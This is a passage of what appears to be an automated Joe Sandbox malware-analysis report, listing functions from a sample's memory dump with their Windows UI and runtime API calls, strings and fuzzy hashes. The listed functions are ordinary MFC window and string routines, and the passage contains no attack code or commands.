Instruction Fuzzy Hash: 8E417130300209AFDB258F15C888FBE77EAAF95710F294569FA5ACB2A0DB71DD418B51

Function 001E37ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001E385C
SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 001E38F9

Strings

, xrefs: 001E3887

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: InfoParametersRectSystemWindow
String ID:
API String ID: 85510744-3916222277
Opcode ID: 9e222d3fbbe67edf6a6c37e6d35cb1c3815e1c692b6df54788956405f7bd3ed2
Instruction ID: 7fc94749d0e5661604de1fea8ab258c9b46eafe20a79806c445300f1c39c16f8
Opcode Fuzzy Hash: 9e222d3fbbe67edf6a6c37e6d35cb1c3815e1c692b6df54788956405f7bd3ed2
Instruction Fuzzy Hash: CD410E71900648EFCB25DF65C8889EEBBF5FF88350F10442EE85AA7251DB715A80DF50

Function 0020088F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

BringWindowToTop.USER32(00000000), ref: 002009BC
BringWindowToTop.USER32(00000000), ref: 002009C4

Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09

Part of subcall function 001DCD55: ShowWindow.USER32(00000000,?,?,001CC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 001DCD66

Strings

X/, xrefs: 002008C7

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Bring$LongShow
String ID: X/
API String ID: 1322630393-1961195256
Opcode ID: 4e193138a49de107cf1083991929ccd3c0f65444ecb9c750a0e88b3f7fb3b0d3
Instruction ID: cd1fe03f75e09492c1209d1ce6b65b8e03f094185e109238c88474d2da04f27f
Opcode Fuzzy Hash: 4e193138a49de107cf1083991929ccd3c0f65444ecb9c750a0e88b3f7fb3b0d3
Instruction Fuzzy Hash: 00415C70B10209AFEF149FA4C896FBEB7B5AF58700F10406AF905EB291DB709C418F90

Function 001C7540 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 001C75B5
_memmove.LIBCMT ref: 001C7606

Part of subcall function 001C7450: std::_Xinvalid_argument.LIBCPMT ref: 001C746A

Strings

string too long, xrefs: 001C75B0

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 8114f32d5c08b50b3d98df9a25da16c723da25fde0e14f49ea2555819a144b0f
Instruction ID: 464dbc8c608f1949f4fb9fd80da57a9858ba272cde94d0cab60d0a6a1c2ec427
Opcode Fuzzy Hash: 8114f32d5c08b50b3d98df9a25da16c723da25fde0e14f49ea2555819a144b0f
Instruction Fuzzy Hash: 8D31C4323186104BD7259A5CA880E7AF7E9EFB5761B20092FF445C76C1C7A1DC408BA0

Function 0021FD77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105timeCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0021FE4B
KillTimer.USER32(?,00000002), ref: 0021FE7A

Strings

, xrefs: 0021FE2F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: KillRectTimerWindow
String ID:
API String ID: 1987732032-3916222277
Opcode ID: 0af0316b228d22db02e2ea36a0042cd715b3cb61822b8292c9ff2590135b197f
Instruction ID: c746baa65f612a979e4d21264da35c34f4d2f3081fddbfa2c488e74bbdf50c3f
Opcode Fuzzy Hash: 0af0316b228d22db02e2ea36a0042cd715b3cb61822b8292c9ff2590135b197f
Instruction Fuzzy Hash: B231A132A106059FCB50DF68D985AEEB7F5FF98310F21053EE42A97252DB74A891CF90

Function 001C6CD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

_localeconv.LIBCMT ref: 001C6CFE

Part of subcall function 002BE0ED: __getptd.LIBCMT ref: 002BE0ED

Part of subcall function 002D8CA9: ____lc_handle_func.LIBCMT ref: 002D8CAC
Part of subcall function 002D8CA9: ____lc_codepage_func.LIBCMT ref: 002D8CB4

Strings

false, xrefs: 001C6D4B
true, xrefs: 001C6D7B

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ____lc_codepage_func____lc_handle_func__getptd_localeconv
String ID: false$true
API String ID: 679402580-2658103896
Opcode ID: 5e903b02ad717ec0d8c6df1e7a63a36bfa963351193ca301ea0d2392b17cf5f7
Instruction ID: 4e9b4eb6714bfb7eda26d86bf4a5cb14847ee8fff80159f2b39e30f5ba70c7fd
Opcode Fuzzy Hash: 5e903b02ad717ec0d8c6df1e7a63a36bfa963351193ca301ea0d2392b17cf5f7
Instruction Fuzzy Hash: CB3146B1A257C0CBC715DFB49481BA6BBE4EF55300F14497ED5A68B302EB71E9088B71

Function 001FA201 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001FA262
GetClientRect.USER32(?,?), ref: 001FA26F

Strings

2, xrefs: 001FA22F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$ClientWindow
String ID: 2
API String ID: 23228050-3001879987
Opcode ID: 9d8ee793663dab36d0c6ed12a10f083471a21592bdc88d190f39b80c8ee33830
Instruction ID: de94e49c1c650580c2ba7b17c7aa85833e9a17fee5072ea00e5825d1e304e7b6
Opcode Fuzzy Hash: 9d8ee793663dab36d0c6ed12a10f083471a21592bdc88d190f39b80c8ee33830
Instruction Fuzzy Hash: 3141E3B1A006099FCB11DFA9C984AFEFBF9FF88300F10051AE65AA3250DB316940DF61

Function 001F6458 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001F645F

Part of subcall function 001D00D5: MoveToEx.GDI32(?,?,?,?), ref: 001D00FF
Part of subcall function 001D00D5: MoveToEx.GDI32(?,?,?,?), ref: 001D0110

Part of subcall function 001CFB68: MoveToEx.GDI32(?,?,?,00000000), ref: 001CFB85
Part of subcall function 001CFB68: LineTo.GDI32(?,?,?), ref: 001CFB94

Part of subcall function 001D06C9: SelectObject.GDI32(?,00000000), ref: 001D06EF
Part of subcall function 001D06C9: SelectObject.GDI32(?,?), ref: 001D0705

Strings

iii, xrefs: 001F648E
iii, xrefs: 001F6481

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Move$ObjectSelect$H_prolog3Line
String ID: iii$iii
API String ID: 3726201289-3499908146
Opcode ID: 3e95b3aa81eca78e6f4112aa241413089f2c1b0de202437a0bad2f724196ab8e
Instruction ID: 4121f1507d36bf6d9ddca370a58e21ca93d9f4156ea34352893b5ac3c10739c9
Opcode Fuzzy Hash: 3e95b3aa81eca78e6f4112aa241413089f2c1b0de202437a0bad2f724196ab8e
Instruction Fuzzy Hash: E4313075A0010AEFCF06EF94D951EEE7B7AAF68310F004029F911A72A1CB75DE21DB65

Function 002A29DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002A2A1F

Strings

4y), xrefs: 002A29E3
4y), xrefs: 002A2AA2

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _wcslen
String ID: 4y)$4y)
API String ID: 176396367-2445369525
Opcode ID: 8d9d0585275515b6b8752dac7c594bb602b68465ebc120bb42d6c3bc9616b8f2
Instruction ID: ab64f5f98b1cab809fe8276f4e274086ff91e7f7f32a402e33235fbaaa0dce88
Opcode Fuzzy Hash: 8d9d0585275515b6b8752dac7c594bb602b68465ebc120bb42d6c3bc9616b8f2
Instruction Fuzzy Hash: 94213733920217C7CB349F6CC8426B773B8EF537A0B188065E8469B192EB70DE59D350

Function 001FB0A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001FB0E3
SetRect.USER32(?,?,?,?,?), ref: 001FB127

Strings

2, xrefs: 001FB14B

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window
String ID: 2
API String ID: 924285169-3001879987
Opcode ID: 15800fc0cbae630a40c56cd4185f79da0c56662acb0854a18970aab2b91424c8
Instruction ID: f0671ff3ce4ddc1756a0067e4b38d5dfa9c7a48924e3a84acb74cbd4c3499516
Opcode Fuzzy Hash: 15800fc0cbae630a40c56cd4185f79da0c56662acb0854a18970aab2b91424c8
Instruction Fuzzy Hash: BA31EDB1D002089FCB10CFA9D9859EEFBF9FF88304B10856AE956E7215D770A9048FA0

Function 001EC492 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001EC499
SetRectEmpty.USER32(?), ref: 001EC529

Strings

Afx:ToolBar, xrefs: 001EC52F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyH_prolog3_Rect
String ID: Afx:ToolBar
API String ID: 2941628838-177727192
Opcode ID: edca05fffe1ac271fcf9ecfce649451856f52111f6d8d6c637ed8f1b85949b83
Instruction ID: c1b7e4b6b72c512cdef96f94acb7f69d53edae36f9ce17fcda72218338299d6b
Opcode Fuzzy Hash: edca05fffe1ac271fcf9ecfce649451856f52111f6d8d6c637ed8f1b85949b83
Instruction Fuzzy Hash: 18218971A6065A9FCF04DFB4C886AEE7AE8FF58350F14052AF516E7280DB349D118BE0

Function 0027444B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00274452
IsWindow.USER32(?), ref: 00274468

Strings

83/, xrefs: 00274497

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3Window
String ID: 83/
API String ID: 616115145-2323854675
Opcode ID: 9173e8d4ea7e9ed1abcf380bcbd41c2ad456fe4cd2d04b432e9a1df98f6a61f6
Instruction ID: 1760c6b363010575c03cebfe193526f443d2f8da23cf8c92a63eca795becf975
Opcode Fuzzy Hash: 9173e8d4ea7e9ed1abcf380bcbd41c2ad456fe4cd2d04b432e9a1df98f6a61f6
Instruction Fuzzy Hash: 2121F1307206119FCF06BFA4D84AAADB7F9BF98700F400169E505AF2A2DF708B118B91

Function 001FCB53 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001FCB5A

Part of subcall function 001DCC18: GetWindowLongW.USER32(?,000000EC), ref: 001DCC23

Strings

Afx:MiniFrame, xrefs: 001FCB8F
2, xrefs: 001FCBFF

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3LongWindow
String ID: Afx:MiniFrame$2
API String ID: 92005281-2466283223
Opcode ID: a6e96f83c7d93d70d26309cff1814c31d4ae9774f95d351aa47c3f486f971e37
Instruction ID: b921a17f8c8befcdde0a51a6eee1fdf6b1490a92b66b6babd66f2c1c425b5bbc
Opcode Fuzzy Hash: a6e96f83c7d93d70d26309cff1814c31d4ae9774f95d351aa47c3f486f971e37
Instruction Fuzzy Hash: E221313021020D9BDB189F71C942FBA36A5EF94350F10012DBA1ACB2D0EB30DC21EBD0

Function 002AA11A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002AA121

Part of subcall function 00297DE9: __EH_prolog3.LIBCMT ref: 00297DF0

Strings

dF/, xrefs: 002AA1B0
X*1, xrefs: 002AA228

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3
String ID: X*1$dF/
API String ID: 431132790-3663479175
Opcode ID: 7c01fec51138dbbd60cccceebef365574460abfadb242d66c9d08f93807798c2
Instruction ID: 15436f41480d13979887808bff55913d0830ce304e0c93f73f2d5f500b940b9a
Opcode Fuzzy Hash: 7c01fec51138dbbd60cccceebef365574460abfadb242d66c9d08f93807798c2
Instruction Fuzzy Hash: 25319C74815B84DAD725EBB4C541BEFBBE0AF31315F10485DE1AB16282CFB42708CB26

Function 001EE41F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001EE426

Part of subcall function 0024EBDB: __EH_prolog3.LIBCMT ref: 0024EBE2

Part of subcall function 0024E8FE: __EH_prolog3.LIBCMT ref: 0024E905

Strings

%sMFCToolBarParameters, xrefs: 001EE459
LargeIcons, xrefs: 001EE4C7

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3
String ID: %sMFCToolBarParameters$LargeIcons
API String ID: 431132790-2076908790
Opcode ID: 2e074d1072bed5c67256f90f679f2c7e7a4db6f3912b6dafd73902abcfd0b941
Instruction ID: 2357a2544502407e2c40b0d1d2bffaea5b9c6ea6b42f33c62b81a5d677f6a81e
Opcode Fuzzy Hash: 2e074d1072bed5c67256f90f679f2c7e7a4db6f3912b6dafd73902abcfd0b941
Instruction Fuzzy Hash: BF219F70A00245EFCF15EFA5C885FEDBBB4AFA4714F144059F5069B292DB719A40CB91

Function 001FC8A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001FC8FC
SendMessageW.USER32(00000000,00000085,00000000,00000000), ref: 001FC934

Strings

2, xrefs: 001FC907

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageRectSendWindow
String ID: 2
API String ID: 2814762282-3001879987
Opcode ID: 588529ba47faa3561993cb5592c758a12f3f4a8042980719a334fce9bdae8285
Instruction ID: 5016e988275b6852e8cba6681c1559ec72a6b1963e510e84ee553053f67dee36
Opcode Fuzzy Hash: 588529ba47faa3561993cb5592c758a12f3f4a8042980719a334fce9bdae8285
Instruction Fuzzy Hash: 90117075A00208ABCB11ABA6DC4ADAFFBB9FFD9700F10056EF506A2251DF705A00DF61

Function 001C7950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 001C7966

Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85A3
Part of subcall function 002D858E: __CxxThrowException@8.LIBCMT ref: 002D85B8
Part of subcall function 002D858E: std::exception::exception.LIBCMT ref: 002D85C9

_memmove.LIBCMT ref: 001C799F

Strings

invalid string position, xrefs: 001C7961

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 4dc1e980384776cc2d507f9ec7bf2748f1b83eade440c47261f104eb315980f7
Instruction ID: 3438f16d67d20a15c128f960f47546791369d9b07657afe1a2da1a31084e86a4
Opcode Fuzzy Hash: 4dc1e980384776cc2d507f9ec7bf2748f1b83eade440c47261f104eb315980f7
Instruction Fuzzy Hash: 3501DB313042414BD72589ACDC90E7AF7AAEBA4764B24492DD1C5C7785D7F1DC418BA4

Function 00200583 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 002005D1
